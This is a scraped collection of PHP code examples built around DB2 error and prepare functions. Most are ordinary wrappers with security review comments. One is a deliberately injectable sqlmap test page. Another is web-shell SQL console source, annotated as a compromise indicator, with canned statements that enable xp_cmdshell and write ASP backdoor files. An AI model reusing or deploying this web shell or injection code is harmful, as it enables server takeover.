Esempio n. 1
 /**
  * Prepares an SQL statement on this object's DB2 connection.
  *
  * The SQL text is handed to db2_prepare() unchanged, so request-derived values belong in
  * parameter markers (`?`) bound at execute time, not in the string itself. On failure the
  * driver's error text becomes the exception message; handlers should log that text rather
  * than render it to clients.
  *
  * @param string $sql SQL text to prepare
  * @return DB2Statement wrapper around the prepared statement resource
  * @throws DB2Exception when db2_prepare() does not return a statement
  */
 function prepare($sql)
 {
     // '@' silences the PHP warning; the failure is reported through the exception below.
     $handle = @db2_prepare($this->_conn, $sql);
     if ($handle) {
         return new DB2Statement($handle);
     }
     throw new DB2Exception(db2_stmt_errormsg());
 }
Esempio n. 2
 /**
  * Prepares and immediately executes an SQL statement on the given connection.
  *
  * The statement is executed without bound parameters, so $sql must already be complete;
  * any request-derived value in it has to be quoted or validated by the caller.
  * The driver's error text is placed in the exception under ':reason' — log it, do not
  * show it to end users.
  *
  * @access public
  * @override
  * @param DB_Connection_Driver $connection  the connection to be used
  * @param string $sql                       the SQL statement to be queried
  * @param integer $mode                     the execution mode (not read by this constructor)
  * @throws Throwable_SQL_Exception          when the statement cannot be prepared or executed
  *
  * @see http://www.php.net/manual/en/function.db2-prepare.php
  * @see http://www.php.net/manual/en/function.db2-execute.php
  * @see http://www.php.net/manual/en/function.db2-stmt-error.php
  */
 public function __construct(DB_Connection_Driver $connection, $sql, $mode = NULL)
 {
     $failure = 'Message: Failed to query SQL statement. Reason: :reason';
     $handle = $connection->get_resource();

     // Prepare step: a FALSE result is reported with the connection-level error text.
     $statement = @db2_prepare($handle, $sql);
     if ($statement === false) {
         throw new Throwable_SQL_Exception($failure, array(':reason' => @db2_conn_errormsg($handle)));
     }

     // Execute step: a failure here is reported with the statement-level error text.
     $executed = @db2_execute($statement);
     if (!$executed) {
         throw new Throwable_SQL_Exception($failure, array(':reason' => @db2_stmt_errormsg($statement)));
     }

     $this->command = $statement;
     // No row has been fetched yet.
     $this->record = false;
 }
Esempio n. 3
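/**
 * Test-bed helper: runs the caller-supplied SQL text against the local DB2 test database
 * and prints the rows as an HTML table.
 *
 * The query is executed exactly as received (no parameter markers, no validation); the
 * inline comments mark it as the injection target of a sqlmap test page. It belongs on an
 * isolated lab host only, together with the hard-coded test credentials below.
 *
 * @param string $query        SQL text to prepare and execute as-is
 * @param bool   $show_errors  true: E_ALL reporting and the DB2 error text is printed;
 *                             false: E_PARSE only and a failed statement prints nothing
 * @param bool   $all_results  false: stop after the first row
 * @param bool   $show_output  false: exit after executing, before any row is printed
 * @return void  the script exits with status 1 on a failed statement or when $show_output is false
 */
function dbQuery($query, $show_errors = true, $all_results = true, $show_output = true)
{
    error_reporting($show_errors ? E_ALL : E_PARSE);
    // Connect to the IBM DB2 database management system
    $link = db2_pconnect("testdb", "db2inst1", "testpass");
    if (!$link) {
        die(db2_conn_errormsg());
    }
    // Print results in HTML
    print "<html><body>\n";
    // Print SQL query to test sqlmap '--string' command line option
    //print "<b>SQL query:</b> " . $query . "<br>\n";
    // Perform SQL injection affected query
    $stmt = db2_prepare($link, $query);
    // A failed prepare yields no statement resource; do not pass it on to db2_execute().
    $result = $stmt ? db2_execute($stmt) : false;
    if (!$result) {
        if ($show_errors) {
            $reason = $stmt ? db2_stmt_errormsg($stmt) : db2_stmt_errormsg();
            // The error text can quote parts of the query, so it is escaped like any other output.
            print "<b>SQL error:</b> " . htmlspecialchars((string) $reason, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "<br>\n";
        }
        exit(1);
    }
    if (!$show_output) {
        exit(1);
    }
    print "<b>SQL results:</b>\n";
    print "<table border=\"1\">\n";
    while ($line = db2_fetch_array($stmt)) {
        print "<tr>";
        foreach ($line as $col_value) {
            // Column values are data, not markup: escape them before they reach the page.
            print "<td>" . htmlspecialchars((string) $col_value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</td>";
        }
        print "</tr>\n";
        if (!$all_results) {
            break;
        }
    }
    print "</table>\n";
    print "</body></html>";
}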
Esempio n. 4
	<script src="js/jquery-1.11.3.min.js"></script>
</head>
<body>
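			<?php
//Connect to database
require_once "connect_db.php";
require_once "algorithm.php";
// Pull trait information from the database. The song title arrives in the request body, so it
// is bound through a parameter marker instead of being concatenated into the SQL text.
$songname = (isset($_POST["name"]) && is_string($_POST["name"])) ? $_POST["name"] : "";
$sql = "SELECT * FROM \"USER04893\" . \"Songs\" WHERE \"title\" = LCASE(?)";
// $conn4 is not defined in this file; presumably connect_db.php provides it.
$stmt = db2_prepare($conn4, $sql);
$losongs = null;
$row = null;
//Fetches the list of similar songs
if (!$stmt || !db2_execute($stmt, array($songname))) {
    // Driver detail goes to the server log; the page only reports that the lookup failed.
    error_log("Song lookup failed: " . ($stmt ? db2_stmt_errormsg($stmt) : db2_stmt_errormsg()));
    echo "SQL Statement Failed";
    return;
} else {
    // db2_fetch_array() returns false when no song matches; getSongs() receives that value as-is.
    $row = db2_fetch_array($stmt);
    $top = getSongs($row);
    $losongs = $top;
}
?>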
	<br>
	<center><img src="images/logo.png" height="300px" width="300px" /></center>
	<table>

		<tr>
			<td colspan="3">The song you searched for is: <?php 
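// The title is database content rendered into HTML, so it is escaped; a missing row prints nothing.
echo is_array($row) ? htmlspecialchars(ucwords((string) $row[0]), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') : '';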
?>
Esempio n. 5
 // NOTE(review): excerpt from inside a loop — $stmt2/$result2 come from a prepare/execute that
 // precedes this fragment, and every `continue` targets a loop that is not visible here.
 if (!$result2) {
     // The driver's statement error text is written into the response before the script stops;
     // it can name tables and columns, so a server-side log is the safer destination.
     echo "exec errormsg: " . db2_stmt_errormsg($stmt2);
     die("Failed Query");
 }
 $bid = db2_fetch_array($stmt2);
 if (!$bid) {
     continue;
     // No row came back: skip this item (original note: not bidding on the item).
 }
 // A row exists (original note: "I bid").
 // Check whether the auction has ended: fetch the bid row only if END_DATE is today or earlier.
 // NOTE(review): $computerName and $itemID are interpolated into the SQL text and their origin is
 // not visible in this excerpt. If either can carry request data, bind ITEM_ID through a `?`
 // marker passed to db2_execute() and check the schema name against a fixed list — confirm
 // against the surrounding code.
 $sql2 = "SELECT HIGHEST_BID_AMOUNT, END_DATE, END_TIME, HIGHEST_BIDDER FROM " . $computerName . ".BIDS WHERE ITEM_ID = {$itemID} and CURRENT DATE >= END_DATE";
 // NOTE(review): the db2_prepare() result is not checked before it is passed to db2_execute().
 $stmt2 = db2_prepare($conn, $sql2);
 $result2 = db2_execute($stmt2);
 if (!$result2) {
     // Same pattern as above: driver error text goes to the response, then the script stops.
     echo "exec errormsg: " . db2_stmt_errormsg($stmt2);
     die("Failed Query");
 }
 $bid = db2_fetch_array($stmt2);
 if (!$bid) {
     // END_DATE is still in the future (or no bid row): nothing to do for this item.
     continue;
 }
 // Column order follows the SELECT list: [0] HIGHEST_BID_AMOUNT, [1] END_DATE, [2] END_TIME, [3] HIGHEST_BIDDER.
 $endTime = $bid[1] . ' ' . $bid[2];
 $curTime = date("Y-m-d H:i:s");
 // Plain string comparison of the two timestamps; skip the item while the end time is later than now.
 // NOTE(review): this assumes the driver returns END_DATE/END_TIME in "Y-m-d" / "H:i:s" text form — TODO confirm.
 if (strcmp($endTime, $curTime) > 0) {
     continue;
 }
 // Same value as assigned a few lines above; the reassignment has no effect.
 $endTime = $bid[1] . ' ' . $bid[2];
 $highestBid = $bid[0];
 $highestBidder = $bid[3];
 // $row is produced outside this excerpt; index 3 is read as the item's condition.
 $condition = $row[3];
Esempio n. 6
File: Db2.php Progetto: netixx/Stock
 /**
  * Executes the prepared statement held in $this->_stmt and resets the column bookkeeping.
  *
  * Values passed in $params are bound by the driver to the statement's parameter markers,
  * which keeps request data out of the SQL text. After a successful execute, $this->_keys
  * holds the result column names and $this->_values one null slot per column.
  *
  * @param array $params OPTIONAL Values to bind to parameter placeholders.
  * @return bool false when no statement is prepared, otherwise the db2_execute() result
  * @throws Zend_Db_Statement_Db2_Exception when db2_execute() returns false
  */
 public function _execute(array $params = null)
 {
     if (!$this->_stmt) {
         return false;
     }

     // '@' silences the PHP warning; a failure is raised as an exception just below.
     $retval = ($params === null)
         ? @db2_execute($this->_stmt)
         : @db2_execute($this->_stmt, $params);

     if ($retval === false) {
         /**
          * @see Zend_Db_Statement_Db2_Exception
          */
         require_once PHP_LIBRARY_PATH . 'Zend/Db/Statement/Db2/Exception.php';
         throw new Zend_Db_Statement_Db2_Exception(db2_stmt_errormsg(), db2_stmt_error());
     }

     // Rebuild the list of column names for the new result set.
     $this->_keys = array();
     $columnTotal = $this->columnCount();
     if ($columnTotal) {
         $index = 0;
         while ($index < $columnTotal) {
             $this->_keys[] = db2_field_name($this->_stmt, $index);
             $index++;
         }
     }

     // One null placeholder per column, or an empty array when there are no columns.
     $this->_values = $this->_keys
         ? array_fill(0, count($this->_keys), null)
         : array();

     return $retval;
 }
Esempio n. 7
 /**
  * Runs a statement on the DB2 connection and records error state and affected-row count.
  *
  * $sql is either SQL text or an array whose element [1] is an already prepared statement
  * handle. With $inputarr the statement is prepared (if needed) and the values are bound by
  * db2_execute(); without it, SQL text goes to db2_exec() unchanged, so callers must not build
  * that text from request data.
  *
  * @param string|array $sql      SQL text, or an array carrying a prepared statement in [1]
  * @param array|false  $inputarr values to bind, or false for none
  * @return mixed the statement resource when the result has columns, true when it has none,
  *               false on failure
  */
 function _query($sql, $inputarr = false)
 {
     // Reset the legacy PHP error-message global so stale text is not picked up later.
     global $php_errormsg;
     if (isset($php_errormsg)) {
         $php_errormsg = '';
     }
     // NOTE(review): this clears _error, while the rest of the method writes _errorMsg — confirm which is intended.
     $this->_error = '';
     if ($inputarr) {
         // Bound-parameter path.
         if (is_array($sql)) {
             $stmtid = $sql[1];
         } else {
             $stmtid = db2_prepare($this->_connectionID, $sql);
             if ($stmtid == false) {
                 // Prepare failed: only the PHP-level message is recorded here.
                 $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : '';
                 return false;
             }
         }
         if (!db2_execute($stmtid, $inputarr)) {
             if ($this->_haserrorfunctions) {
                 $this->_errorMsg = db2_stmt_errormsg();
                 $this->_errorCode = db2_stmt_error();
             }
             return false;
         }
     } else {
         if (is_array($sql)) {
             // Prepared statement without bound values.
             $stmtid = $sql[1];
             if (!db2_execute($stmtid)) {
                 if ($this->_haserrorfunctions) {
                     $this->_errorMsg = db2_stmt_errormsg();
                     $this->_errorCode = db2_stmt_error();
                 }
                 return false;
             }
         } else {
             // Direct execution of the SQL text as given; a failure is handled in the block below.
             $stmtid = @db2_exec($this->_connectionID, $sql);
         }
     }
     $this->_lastAffectedRows = 0;
     if ($stmtid) {
         if (@db2_num_fields($stmtid) == 0) {
             // No result columns: keep the row count and return true instead of the handle.
             $this->_lastAffectedRows = db2_num_rows($stmtid);
             $stmtid = true;
         } else {
             $this->_lastAffectedRows = 0;
         }
         // Success: clear the stored error state.
         if ($this->_haserrorfunctions) {
             $this->_errorMsg = '';
             $this->_errorCode = 0;
         } else {
             $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : '';
         }
     } else {
         // Failure (reached from the db2_exec() path): record the driver's message and code.
         if ($this->_haserrorfunctions) {
             $this->_errorMsg = db2_stmt_errormsg();
             $this->_errorCode = db2_stmt_error();
         } else {
             $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : '';
         }
     }
     return $stmtid;
 }
Esempio n. 8
 /**
  * Executes SQL text directly on the underlying DB2 connection, discarding any result.
  *
  * The text reaches db2_exec() unchanged, so it must not be assembled from request data.
  * The exception message contains both the full SQL and the driver's error text; route it
  * to logs rather than to a client-facing error page.
  *
  * @param string $sql SQL text to execute
  * @return void
  * @throws Db\Exception when db2_exec() does not return a statement
  */
 protected function _rawQuery($sql)
 {
     $conn = $this->_db->getConnection();
     // '@' silences the PHP warning; the failure surfaces as the exception below.
     $handle = @db2_exec($conn, $sql);
     if ($handle) {
         return;
     }
     $e = db2_stmt_errormsg();
     throw new Db\Exception("SQL error for \"{$sql}\": {$e}");
 }
Esempio n. 9
/**
 * NOTE(review): browser-driven SQL console of the kind bundled in PHP web shells; this is
 * not application code, and finding it on a server is an indicator of compromise.
 *
 * What the code shows:
 *  - The back end is chosen by the `db` query parameter; host, account, password and the SQL
 *    text all come from POST fields.
 *  - No authentication or authorization check appears anywhere in this function.
 *  - The submitted SQL is passed unchanged to mssql_query(), ociparse(), ifx_query(),
 *    db2_exec() or ibase_query(), and the rows are printed as an HTML table.
 *  - POST values and result cells are written into the page without HTML escaping.
 *  - The MSSQL form carries canned statements that re-enable xp_cmdshell and OLE automation
 *    and that write a script file to disk.
 *
 * For responders: preserve the file and the web server logs, review POST requests whose query
 * string matches the form actions below (`?s=gg&db=...`), and rotate every database credential
 * reachable from the host. For hunting, the procedure names embedded in the canned statements
 * (xp_cmdshell, sp_oacreate, sp_makewebtask) appearing inside PHP source are a strong signal.
 * On the database side, keep xp_cmdshell and Ole Automation Procedures disabled, keep web
 * application accounts out of sysadmin, and alert on sp_configure changes.
 */
function otherdb()
{
    // Back-end selector taken from the query string and echoed into the form action unescaped.
    $db = isset($_GET['db']) ? $_GET['db'] : 'ms';
    print <<<END
<form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data">
<div class="actall">
<a href="?s=gg&db=ms"> &nbsp MSSQL &nbsp</a>
<a href="?s=gg&db=ora"> &nbsp Oracle &nbsp</a>
<a href="?s=gg&db=ifx"> &nbsp InforMix &nbsp</a>
<a href="?s=gg&db=fb"> &nbsp  FireBird &nbsp</a>
<a href="?s=gg&db=db2">&nbsp DB2 &nbsp</a></div></form>
END;
    if ($db == "ms") {
        // MSSQL branch: connection settings and SQL text are read from the POST body.
        $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
        $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******';
        $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '';
        $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
        $msaction = isset($_POST['action']) ? $_POST['action'] : '';
        $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
        $msquery = stripslashes($msquery);
        print <<<END
<div class="actall">
<form method="POST" name="msform" action="?s=gg&db=ms">
Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br>
<script language="javascript">
function msFull(i){
\tStr = new Array(11);
\tStr[0] = "";
\tStr[1] = "select @@version;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select name from sysobject where type='U';";
\tStr[4] = "select name from syscolumns where id=Object_Id('table_name');";
\tStr[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
\tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
\tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
\tStr[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
\tStr[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
\tStr[10] = "Exec master.dbo.xp_cmdshell 'net user';";
\tStr[11] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
\tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
\tmsform.mssql.value = Str[i];
\treturn true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
\t<option value="5">sp_oacreate</option>
\t<option value="6">xp_cmdshell</option>
\t<option value="7">xp_cmdshell(2005)</option>
\t<option value="8">sp_oacreate(2005)</option>
\t<option value="9">����openrowset(2005)</option>
\t<option value="10">xp_cmdshell exec</option>
\t<option value="10">sp_oamethod exec</option>
\t<option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></form></div>
END;
        if ($msaction == 'msquery') {
            // The submitted SQL is sent to the server unchanged; result cells are echoed unescaped.
            $msconn = mssql_connect($mshost, $msuser, $mspass);
            mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
            $msresult = mssql_query($msquery) or die(mssql_get_last_message());
            echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
            for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                echo '<td><b>' . mssql_field_name($msresult, $i) . "</b></td>\n";
            }
            echo "</tr>\n";
            mssql_data_seek($result, 0);
            while ($msrow = mssql_fetch_row($msresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                    echo '<td>' . "{$msrow[$i]}" . '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table></font>";
            mssql_free_result($msresult);
            mssql_close();
        }
    } elseif ($db == "ora") {
        // Oracle branch: same pattern, with host, port and SID also taken from the POST body.
        $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
        $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
        $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******';
        $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******';
        $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
        $oraaction = isset($_POST['action']) ? $_POST['action'] : '';
        $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
        $oraquery = stripslashes($oraquery);
        print <<<END
<form method="POST" name="oraform" action="?s=gg&db=ora">
<div class="actall">
Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br>
<script language="javascript">
function oraFull(i){
Str = new Array(5);
\tStr[0] = "";
\tStr[1] = "select version();";
\tStr[2] = "SELECT NAME FROM V{$DATABASE}";
\tStr[3] = "select * From all_objects where object_type='TABLE'";
\tStr[4] = "select column_name from user_tab_columns where table_name='table1'";
\toraform.orasql.value = Str[i];
\treturn true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($oraaction == 'oraquery') {
            $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
            $oraresult = ociparse($oralink, $oraquery) or die(ocierror());
            $orarow = oci_fetch_row($oraresult);
            echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
            for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
                echo '<td><b>' . oci_field_name($oraresult, $i) . "</b></td>\n";
            }
            echo "</tr>\n";
            ociresult($oraresult, 0);
            while ($orarow = ora_fetch_row($oraresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ora_num_fields($result); $i++) {
                    echo '<td>' . "{$orarow[$i]}" . '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table></font>";
            oci_free_statement($oraresult);
            ocilogoff();
        }
    } elseif ($db == "ifx") {
        // Informix branch; the canned statements include a read of the sysusers account table.
        $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******';
        $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******';
        $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
        $ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
        $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
        $ifxquery = stripslashes($ifxquery);
        print <<<END
<form method="POST" name="ifxform" action="?s=gg&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br>
<script language="javascript">
function ifxFull(i){
Str = new Array(11);
\tStr[0] = "";
\tStr[1] = "select dbservername from sysobjects;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select tabname from systables;";
\tStr[4] = "select colname from syscolumns where tabid=n;";
\tStr[5] = "select username,usertype,password from sysusers;";
\tifxform.ifxsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�����������</option>
\t<option value="1">���ݿ�</option>
\t<option value="2">����</option>
\t<option value="3">�ֶ�</option>
\t<option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($ifxaction == 'ifxquery') {
            $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
            $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
            $ifxrow = ifx_fetch_row($ifxresult);
            echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
            for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                echo '<td><b>' . ifx_fieldproperties($ifxresult) . "</b></td>\n";
            }
            echo "</tr>\n";
            mysql_data_seek($ifxresult, 0);
            while ($ifxrow = ifx_fetch_row($ifxresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                    echo '<td>' . "{$ifxrow[$i]}" . '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table></font>";
            ifx_free_result($ifxresult);
            ifx_close();
        }
    } elseif ($db == "db2") {
        // DB2 branch: settings and SQL text again come from the POST body.
        $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
        $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
        $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******';
        $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******';
        $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
        $db2action = isset($_POST['action']) ? $_POST['action'] : '';
        $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
        $db2query = stripslashes($db2query);
        print <<<END
<form method="POST" name="db2form" action="?s=gg&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br>
<script language="javascript">
function db2Full(i){
Str = new Array(4);
\tStr[0] = "";
\tStr[1] = "select schemaname from syscat.schemata;";
\tStr[2] = "select name from sysibm.systables;";
\tStr[3] = "select colname from syscat.columns where tabname='table_name';";
\tStr[4] = "db2 get db cfg for db_name;";
db2form.db2sql.value = Str[i];
return true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">���ݿ�����</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($myaction == 'db2query') {
            $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
            $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
            $db2row = db2_fetch_row($db2result);
            echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
            for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                echo '<td><b>' . db2_field_name($db2result) . "</b></td>\n";
            }
            echo "</tr>\n";
            while ($db2row = db2_fetch_row($db2result)) {
                echo "<tr>\n";
                for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                    echo '<td>' . "{$db2row[$i]}" . '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table></font>";
            db2_free_result($db2result);
            db2_close();
        }
    } elseif ($db == "fb") {
        // Firebird branch: the database file path is also taken from the POST body.
        $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
        $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
        $fbpath = str_replace("\\\\", "\\", $fbpath);
        $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******';
        $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******';
        $fbaction = isset($_POST['action']) ? $_POST['action'] : '';
        $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
        $fbquery = stripslashes($fbquery);
        print <<<END
<form method="POST" name="fbform" action="?s=gg&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
Str = new Array(5);
\tStr[0] = "";
\tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
\tStr[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
\tStr[3] = "input 'D:\\createtable.sql';";
\tStr[4] = "shell netstat -an;";
fbform.fbsql.value = Str[i];
return true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">����sql</option>
\t<option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($fbaction == 'fbquery') {
            $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
            $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
            echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
            for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                echo '<td><b>' . ibase_field_info($fbresult, $i) . "</b></td>\n";
            }
            echo "</tr>\n";
            ibase_field_info($fbresult, 0);
            while ($fbrow = ibase_fetch_row($fbresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                    echo '<td>' . "{$fbrow[$i]}" . '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table></font>";
            ibase_free_result($fbresult);
            ibase_close();
        }
    }
}
Esempio n. 10
File: Db2.php Progetto: hjr3/zf2
 /**
  * Executes the prepared statement held in $this->_stmt and resets the column bookkeeping.
  *
  * Values in $params are bound by the driver to the statement's parameter markers, so
  * request data never has to be spliced into the SQL text. On success $this->_keys lists
  * the result column names and $this->_values holds one null slot per column.
  *
  * @param array $params OPTIONAL Values to bind to parameter placeholders.
  * @return bool false when no statement is prepared, otherwise the db2_execute() result
  * @throws \Zend\Db\Statement\Db2Exception when db2_execute() returns false
  */
 public function _execute(array $params = null)
 {
     if (!$this->_stmt) {
         return false;
     }

     // '@' silences the PHP warning; a failed execute is raised as an exception instead.
     if ($params === null) {
         $retval = @db2_execute($this->_stmt);
     } else {
         $retval = @db2_execute($this->_stmt, $params);
     }
     if ($retval === false) {
         throw new Db2Exception(db2_stmt_errormsg(), db2_stmt_error());
     }

     // Collect the column names of the new result set.
     $this->_keys = array();
     $columnTotal = $this->columnCount();
     if ($columnTotal) {
         $position = 0;
         while ($position < $columnTotal) {
             $this->_keys[] = db2_field_name($this->_stmt, $position);
             $position++;
         }
     }

     // One null placeholder per column, or an empty array when the result has no columns.
     $this->_values = $this->_keys
         ? array_fill(0, count($this->_keys), null)
         : array();

     return $retval;
 }
Esempio n. 11
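 /**
  * Returns the last DB2 statement error message.
  *
  * db2_stmt_errormsg() expects a statement resource, not a connection. Called without an
  * argument it reports the error from the most recent attempt to obtain a statement
  * (db2_prepare() / db2_exec()), which is what this accessor is meant to expose.
  * The text can name tables and columns; log it rather than printing it to visitors.
  *
  * @access  public
  * @author  Thorsten Rinne <*****@*****.**>
  * @since   2005-04-16
  * @return  string
  */
 function error()
 {
     return db2_stmt_errormsg();
 }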
Esempio n. 12
 /**
  * Returns the message for the most recent DB2 statement error.
  *
  * The driver text can include object names from the failing statement, so it is meant for
  * logs and exceptions, not for output shown to end users.
  *
  * @param mixed $conn not read by this method
  * @return string result of db2_stmt_errormsg() called without a statement argument
  */
